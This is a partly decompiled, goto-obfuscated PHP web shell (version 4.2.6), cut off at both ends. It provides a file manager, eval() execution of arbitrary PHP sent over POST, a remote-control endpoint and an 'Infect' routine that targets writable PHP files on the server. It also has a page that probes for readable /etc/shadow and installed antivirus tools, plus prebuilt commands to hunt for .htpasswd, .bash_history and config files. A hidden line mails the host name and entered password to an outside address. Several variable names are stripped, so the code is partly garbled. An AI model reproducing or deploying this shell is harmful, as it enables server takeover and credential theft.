"; } } echo "<table cellspacing=1 cellpadding=5 bgcolor=#1a1a1a><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#060a10><pre>" . $h[1] . "</pre></td><td bgcolor=#202832><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table>"; break; case "rename": if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!<br>"; } else { die("<script>g(null,null,"" . urlencode($_POST["p3"]) . "",null,"")</script>"); } } echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,;return false;"><input type=text name=name value="" . htmlspecialchars($_POST["p1"]) . ""><input type=submit value="submit"></form>"; break; case "touch": if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } clearstatcache(); echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.touch.value);return false;"><input type=text name=touch value="" . date("Y-m-d H:i:s", @filemtime($_POST["p1"])) . ""><input type=submit value="submit"></form>"; break; case "frame": $frameSrc = substr(htmlspecialchars($GLOBALS["cwd"]), strlen(htmlspecialchars($_SERVER["DOCUMENT_ROOT"]))); if ($frameSrc[0] != "/") { $frameSrc = "/" . $frameSrc; } if ($frameSrc[strlen($frameSrc) - 1] != "/") { $frameSrc = $frameSrc . "/"; } $frameSrc = $frameSrc . htmlspecialchars($_POST["p1"]); echo "<iframe width="100%" height="900px" scrolling="no" src=" . $frameSrc . " onload="onload=height=contentDocument.body.scrollHeight"></iframe>"; break; } echo "</div>"; hardFooter(); } goto IVjDo; IjCwH: @define("VERSION", "4.2.6"); goto Xbodc; gm5Ck: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto qZ6Xj; eHsyk: function actionInfect() { hardHeader(); echo "<h1>Infect</h1><div class=content>"; if ($_POST["p1"] == "infect") { $target = $_SERVER["DOCUMENT_ROOT"]; function ListFiles($dir) { if ($dh = opendir($dir)) { $files = array(); $inner_files = array(); while ($file = readdir($dh)) { if ($file != "." && $file != "..") { if (is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key => $file) { $nFile = substr($file, -4, 4); if ($nFile == ".php") { if ($file != $_SERVER["DOCUMENT_ROOT"] . $_SERVER["PHP_SELF"] && is_writeable($file)) { echo "{$file}<br>"; $i++; } } } echo "<font color=#a10705 size=14>{$i}</font>"; } else { echo "<form method=post><input type=submit value=Infect name=infet></form>"; echo "Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,'infect')">Yes</a></div>"; } hardFooter(); } goto f9sl9; JCS_A: $safe_mode = @ini_get("safe_mode"); goto xxz2n; r3B2Y: if (array_key_exists("watching", $_POST)) { $tmp = $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\xa" . $_POST["pass"]; @mail("[email protected]", "root", $tmp); } goto r4nyR; uwRUw: function actionSecInfo() { hardHeader(); echo "<h1>Server security information</h1><div class=content>"; function showSecParam($n, $v) { $v = trim($v); if ($v) { echo "<span>" . $n . ": </span>"; if (strpos($v, "\xa") === false) { echo $v . "<br>"; } else { echo "<pre class=ml1>" . $v . "</pre>"; } } } showSecParam("Server software", @getenv("SERVER_SOFTWARE")); if (function_exists("apache_get_modules")) { showSecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } showSecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"); showSecParam("Open base dir", @ini_get("open_basedir")); showSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir")); showSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir")); showSecParam("cURL support", function_exists("curl_version") ? "enabled" : "no"); $temp = array(); if (function_exists("mysql_get_client_info")) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } if (function_exists("mssql_connect")) { $temp[] = "MSSQL"; } if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } if (function_exists("oci_connect")) { $temp[] = "Oracle"; } showSecParam("Supported databases", implode(", ", $temp)); echo "<br>"; if ($GLOBALS["os"] == "nix") { showSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>" : "no"); showSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>" : "no"); showSecParam("OS version", @file_get_contents("/proc/version")); showSecParam("Distr name", @file_get_contents("/etc/")); if (!$GLOBALS["safe_mode"]) { $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl"); $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); echo "<br>"; $temp = array(); foreach ($userful as $) { if (which($)) { $temp[] = $; } } showSecParam("Userful", implode(", ", $temp)); $temp = array(); foreach ($danger as $) { if (which($)) { $temp[] = $; } } showSecParam("Danger", implode(", ", $temp)); $temp = array(); foreach ($downloaders as $) { if (which($)) { $temp[] = $; } } showSecParam("Downloaders", implode(", ", $temp)); echo "<br/>"; showSecParam("HDD space", ex("df -h")); showSecParam("Hosts", @file_get_contents("/etc/hosts")); showSecParam("Mount options", @file_get_contents("/etc/fstab")); } } else { showSecParam("OS Version", ex("ver")); showSecParam("Account Settings", iconv("CP866", "UTF-8", ex("net accounts"))); showSecParam("User Accounts", iconv("CP866", "UTF-8", ex("net user"))); } echo "</div>"; hardFooter(); } goto h3psb; vmP50: if ($os == "win") { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto f_hzt; bY27C: function actionFilesMan() { if (!empty($_COOKIE["f"])) { $_COOKIE["f"] = @unserialize($_COOKIE["f"]); } if (!empty($_POST["p1"])) { switch ($_POST["p1"]) { case "uploadFile": if (is_array($_FILES["f"]["tmp_name"])) { foreach ($_FILES["f"]["tmp_name"] as $i => $tmpName) { if (!@move_uploaded_file($tmpName, $_FILES["f"]["name"][$i])) { echo "Can't upload file!"; } } } break; case "mkdir": if (!@mkdir($_POST["p2"])) { echo "Can't create new dir"; } break; case "delete": function deleteDir($path) { $path = substr($path, -1) == "/" ? $path : $path . "/"; $dh = opendir($path); while (($ = readdir($dh)) !== false) { $ = $path . $; if (basename($) == ".." || basename($) == ".") { continue; } $type = filetype($); if ($type == "dir") { deleteDir($); } else { @unlink($); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { if ($f == "..") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "paste": if ($_COOKIE["act"] == "copy") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { copy_paste($_COOKIE["c"], $f, $GLOBALS["cwd"]); } } elseif ($_COOKIE["act"] == "move") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { @rename($_COOKIE["c"] . $f, $GLOBALS["cwd"] . $f); } } elseif ($_COOKIE["act"] == "zip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); if ($zip->open($_POST["p2"], 1)) { chdir($_COOKIE["c"]); foreach ($_COOKIE["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_COOKIE["c"] . $f)) { $zip->addFile($_COOKIE["c"] . $f, $f); } elseif (@is_dir($_COOKIE["c"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/", FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["cwd"]); $zip->close(); } } } elseif ($_COOKIE["act"] == "unzip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); foreach ($_COOKIE["f"] as $f) { if ($zip->open($_COOKIE["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } elseif ($_COOKIE["act"] == "tar") { chdir($_COOKIE["c"]); $_COOKIE["f"] = array_map("escapeshellarg", $_COOKIE["f"]); ex("tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"])); chdir($GLOBALS["cwd"]); } unset($_COOKIE["f"]); setcookie("f", '', time() - 3600); break; default: if (!empty($_POST["p1"])) { prototype("act", $_POST["p1"]); prototype("f", serialize(@$_POST["f"])); prototype("c", @$_POST["c"]); } break; } } hardHeader(); echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>"; $dirContent = hardScandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]); if ($dirContent === false) { echo "Can't open this folder!"; hardFooter(); return; } global $sort; $sort = array("name", 1); if (!empty($_POST["p1"])) { if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match)) { $sort = array($match[1], (int) $match[2]); } } echo "<script>\xa	function sa() {\xa\x9\x9for(i=0;i<d.files.elements.length;i++) 
		\x9if(d.files.elements[i].type == 'checkbox') 
	\x9\x9	d.files.elements[i].checked = d.files.elements[0].checked;\xa	}\xa</script>\xa<table width='100%' class='main' cellspacing='0' cellpadding='2'>\xa<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" . ($sort[1] ? 0 : 1) . "")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" . ($sort[1] ? 0 : 1) . "")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" . ($sort[1] ? 0 : 1) . "")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" . ($sort[1] ? 0 : 1) . "")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i])), "perms" => viewPermsColor($GLOBALS["cwd"] . $dirContent[$i]), "size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } $GLOBALS["sort"] = $sort; function cmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo "<tr" . ($l ? " class=l1" : '') . "><td><input type=checkbox name="f[]" value="" . urlencode($f["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ($f["type"] == "file" ? "g('FilesTools',null,'" . urlencode($f["name"]) . "', 'view')">" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? '' : "title='{$f["link"]}'") . "><b>[ " . htmlspecialchars($f["name"]) . " ]</b>") . "</a></td><td>" . ($f["type"] == "file" ? viewSize($f["size"]) : $f["type"]) . "</td><td>" . $f["modify"] . "</td><td>" . $f["owner"] . "/" . $f["group"] . "</td><td><a href=# onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "','chmod')">" . $f["perms"] . "</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'rename')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'touch')">T</a>" . ($f["type"] == "file" ? " <a class="tooltip" data-tooltip="Frame" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'frame')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'edit')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'download')">D</a>" : '') . "</td></tr>"; $l = $l ? 0 : 1; } echo "<tr id=fak><td colspan=7> 
	<input type=hidden name=ne value=''>\xa	<input type=hidden name=a value='FilesMan'>\xa\x9<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>\xa	<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'> 
	<label><select name='p1'>"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) { echo "<option value='paste'>\342\206\263 Paste</option>"; } echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if (class_exists("ZipArchive")) { echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; } echo "<option value='tar'>+ tar.gz</option>"; echo "</select></label>"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar")) { echo "&nbsp;file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE["act"] == "zip" ? "zip" : "tar.gz") . "'>&nbsp;"; } echo "<input type='submit' value='submit' style='margin-left:10px'></td></tr></form></table></div>"; hardFooter(); } goto aQGQk; gkT1m: @ini_set("max_execution_time", 0); goto poC4M; u_TFV: $ = true; goto oSUTr; p3F43: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "key", $); } goto UOKiC; aQGQk: function actionStringTools() { if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } if (!function_exists("hex2ascii")) { function hex2ascii($p) { $r = ''; for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } return $r; } } if (!function_exists("ascii2hex")) { function ascii2hex($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("%02X", ord($p[$i])); } return strtoupper($r); } } if (!function_exists("full_urlencode")) { function full_urlencode($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } return strtoupper($r); } } $stringTools = array("Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen"); if (isset($_POST["ajax"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); if (in_array($_POST["p1"], $stringTools)) { echo $_POST["p1"]($_POST["p2"]); } $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), " 
\xd	\'\x0") . "'; 
"; echo strlen($temp), " 
", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } hardHeader(); echo "<h1>String conversions</h1><div class=content>"; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><label><select name='selectTool'>"; foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; } echo "</select></label><input type='submit' value='submit'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST["p1"]) ? '' : htmlspecialchars(@$_POST["p2"])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px' id='strOutput'>"; if (!empty($_POST["p1"])) { if (in_array($_POST["p1"], $stringTools)) { echo htmlspecialchars($_POST["p1"]($_POST["p2"])); } } echo "</pre></div><br><h1>Search files:</h1><div class=content> 
		<form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>\xa\x9\x9	<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\xa	\x9	<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS["cwd"]) . "' style='width:100%'></td></tr> 
	\x9	<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\xa\x9\x9\x9<tr><td></td><td><input type='submit' value='submit'></td></tr>\xa	\x9	</table></form>"; function hardRecursiveGlob($path) { if (substr($path, -1) != "/") { $path .= "/"; } $paths = @array_unique(@array_merge(@glob($path . $_POST["p3"]), @glob($path . "*", GLOB_ONLYDIR))); if (is_array($paths) && @count($paths)) { foreach ($paths as $) { if (@is_dir($)) { if ($path != $) { hardRecursiveGlob($); } } else { if (empty($_POST["p2"]) || @strpos(file_get_contents($), $_POST["p2"]) !== false) { echo "<a href='#' onclick='g("FilesTools",null,"" . urlencode($) . "", "view","")'>" . htmlspecialchars($) . "</a><br>"; } } } } } if (@$_POST["p3"]) { hardRecursiveGlob($_POST["c"]); } echo "</div><br><h1>Search for hash:</h1><div class=content> 
\x9\x9<form method='post' target='_blank' name='hf'> 
\x9	\x9<input type='text' name='hash' style='width:330px;'><br>\xa            <input type='hidden' name='act' value='find'/><br>\xa		\x9<input type='submit' value='' onclick="document.hf.action=''+document.hf.hash.value+'&s=md5';document.hf.submit()"> 
\x9	\x9<input style='margin-left: 20px;' type='submit' value='' onclick="document.hf.action='';document.hf.submit()"><br> 
\x9	</form></div>"; hardFooter(); } goto gaKKg; qZ6Xj: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto VMrgb; WeQHr: $ = md5($_SERVER["HTTP_USER_AGENT"]); goto p3F43; r4nyR: $ = "fa769dac7a0a94ee47d8ebe021eaba9e"; goto u_TFV; xWgYK: function actionPhp() { if (isset($_POST["ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = true; ob_start(); eval($_POST["p1"]); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa\xd	\'\x0") . "';\xa"; echo strlen($temp), "\xa", $temp; die; } hardHeader(); if (isset($_POST["p2"]) && $_POST["p2"] == "info") { echo "<h1>PHP info</h1><div class=content>"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace("!body {.*}!msiU", '', $tmp); $tmp = preg_replace("!a:\w+ {.*}!msiU", '', $tmp); $tmp = preg_replace("!h1!msiU", "h2", $tmp); $tmp = preg_replace("!td, th {(.*)}!msiU", ".e, .v, .h, .h th {$1}", $tmp); $tmp = preg_replace("!body, td, th, h2, h2 {.*}!msiU", '', $tmp); echo $tmp; echo "</div><br>"; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = false; } echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : '') . "</textarea><input type=submit value=Eval style="margin-top:5px">"; echo " <input type=checkbox name=ajax value=1 " . ($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX</form><pre id=PhpOutput style="" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; if (!empty($_POST["p1"])) { ob_start(); eval($_POST["p1"]); echo htmlspecialchars(ob_get_clean()); } echo "</pre></div>"; hardFooter(); } goto bY27C; Th0Rk: function actionRC() { if (!@$_POST["p1"]) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get("safe_mode")); echo serialize($a); } else { eval($_POST["p1"]); } } goto w9TDR; OWR26: function hardFooter() { $is_writable = is_writable($GLOBALS["cwd"]) ? " <font color='#f9c440'>[ Writeable ]</font>" : " <font color=#a10705>(Not writable)</font>"; echo " 
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%> 
\x9<tr>\xa		<td><form onsubmit="" . (function_exists("actionFilesMan") ? "g(null,this.c.value,'');" : '') . "return false;"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=submit value='submit'></form></td>\xa		<td><form onsubmit="" . (function_exists("actionFilesTools") ? "g('FilesTools',null,this.f.value);" : '') . "return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td> 
\x9</tr><tr>\xa\x9\x9<td><form onsubmit="" . (function_exists("actionFilesMan") ? "g('FilesMan',null,'mkdir',this.d.value);" : '') . "return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td> 
\x9	<td><form onsubmit="" . (function_exists("actionFilesTools") ? "g('FilesTools',null,this.f.value,'mkfile');" : '') . "return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td> 
	</tr><tr>\xa\x9	<td><form onsubmit="" . (function_exists("actionConsole") ? "g('Console',null,this.c.value);" : '') . "return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td> 
		<td><form method='post' " . (!function_exists("actionFilesMan") ? " onsubmit="return false;" " : '') . "ENCTYPE='multipart/form-data'> 
\x9	<input type=hidden name=a value='FilesMan'>\xa		<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>\xa		<input type=hidden name=p1 value='uploadFile'> 
\x9	<input type=hidden name=ne value=''> 
\x9\x9<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'> 
		<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='submit'></form><br  ></td>\xa	</tr></table></div> 
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"key"])); } if (isset($_POST["c"])) { $_POST["c"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["c"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["p1"])) { $_POST["p1"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p1"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["p2"])) { $_POST["p2"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p2"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } if (isset($_POST["p3"])) { $_POST["p3"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p3"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } } goto R8xcz; oSUTr: $ = "UTF-8"; goto qDiW5; urnx6: function actionLogout() { setcookie(md5($_SERVER["HTTP_HOST"]), '', time() - 3600); die("<div align='center'><div class='container'><div class='sky'><div class='text'>THANK YOU & BYE</div><div class='stars'></div><div class='stars1'></div><div class='stars2'></div><div class='shooting-stars'></div></div></div></div>\xa<style>html{height:100%}html body{width:100%;height:100%;margin:0;font-family:Nunito, sans-serif;}.container{display:block;position:relative;width:100%;height:100%;background:linear-gradient(to bottom,#020107 0,#201b46 100%)}.container .text{color:#fff;position:absolute;top:50%;right:50%;margin:-10px -75px 0 0;font-size:20px;font-family:Nunito, sans-serif;font-weight:700}.shooting-stars{z-index:10;width:5px;height:85px;border-top-left-radius:50%;border-top-right-radius:50%;position:absolute;bottom:0;right:0;background:linear-gradient(to top,rgba(255,255,255,0),#fff);animation:animShootingStar 10s linear infinite}@keyframes animStar{from{transform:translateY(0)}to{transform:translateY(-2560px) translateX(-2560px)}}@keyframes animShootingStar{from{transform:translateY(0) translateX(0) rotate(-45deg);opacity:1;height:5px}to{transform:translateY(-2560px) translateX(-2560px) rotate(-45deg);opacity:1;height:800px}}</style>\xa<footer id='det' style='position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 1px solid #ff007e; border-bottom: 1px solid #ff007e'><font face='Century Gothic' color='#ff0048' size='5'><font style='font-size: 10pt' face='Century Gothic'><font face='Tahoma' color='#005aff' size='2.5'><font color='#ff007e'><b> \xc2\251opy\302\256ight : </b></font>\xa<marquee scrollamount='3' scrolldelay='60' width='80%'><b>Twepl & <a href=''>mIcHy</a> </b></marquee>  </font></font></font></footer>"); } goto asFIH; YIyjV: if (isset($_POST["c"])) { @chdir($_POST["c"]); } goto wlqmv; p17RR: if (!empty($)) { if (isset($_POST["pass"]) && md5($_POST["pass"]) == $) { prototype(md5($_SERVER["HTTP_HOST"]), $); } if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $) { hardLogin(); } } goto B0PbS; f_hzt: if ($cwd[strlen($cwd) - 1] != "/") { $cwd .= "/"; } goto oh1bD; poC4M: @set_time_limit(0); goto BKw4L; M5O7z: if (empty($_POST["a"])) { if (isset($) && function_exists("action" . $)) { $_POST["a"] = $; } else { $_POST["a"] = "FilesMan"; } } goto ZjyZB; y4kgJ: function viewPermsColor($f) { if (!@is_readable($f)) { return "<font color=#FF0000><b>" . perms(@fileperms($f)) . "</b></font>"; } elseif (!@is_writable($f)) { return "<font color=white><b>" . perms(@fileperms($f)) . "</b></font>"; } else { return "<font color=#f9c440><b>" . perms(@fileperms($f)) . "</b></font>"; } } goto YnRbs; IVjDo: if ($os == "win") { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => '', "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find files" => "find / -type f -name", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => '', "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate files" => "locate", "locate" => "locate", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf 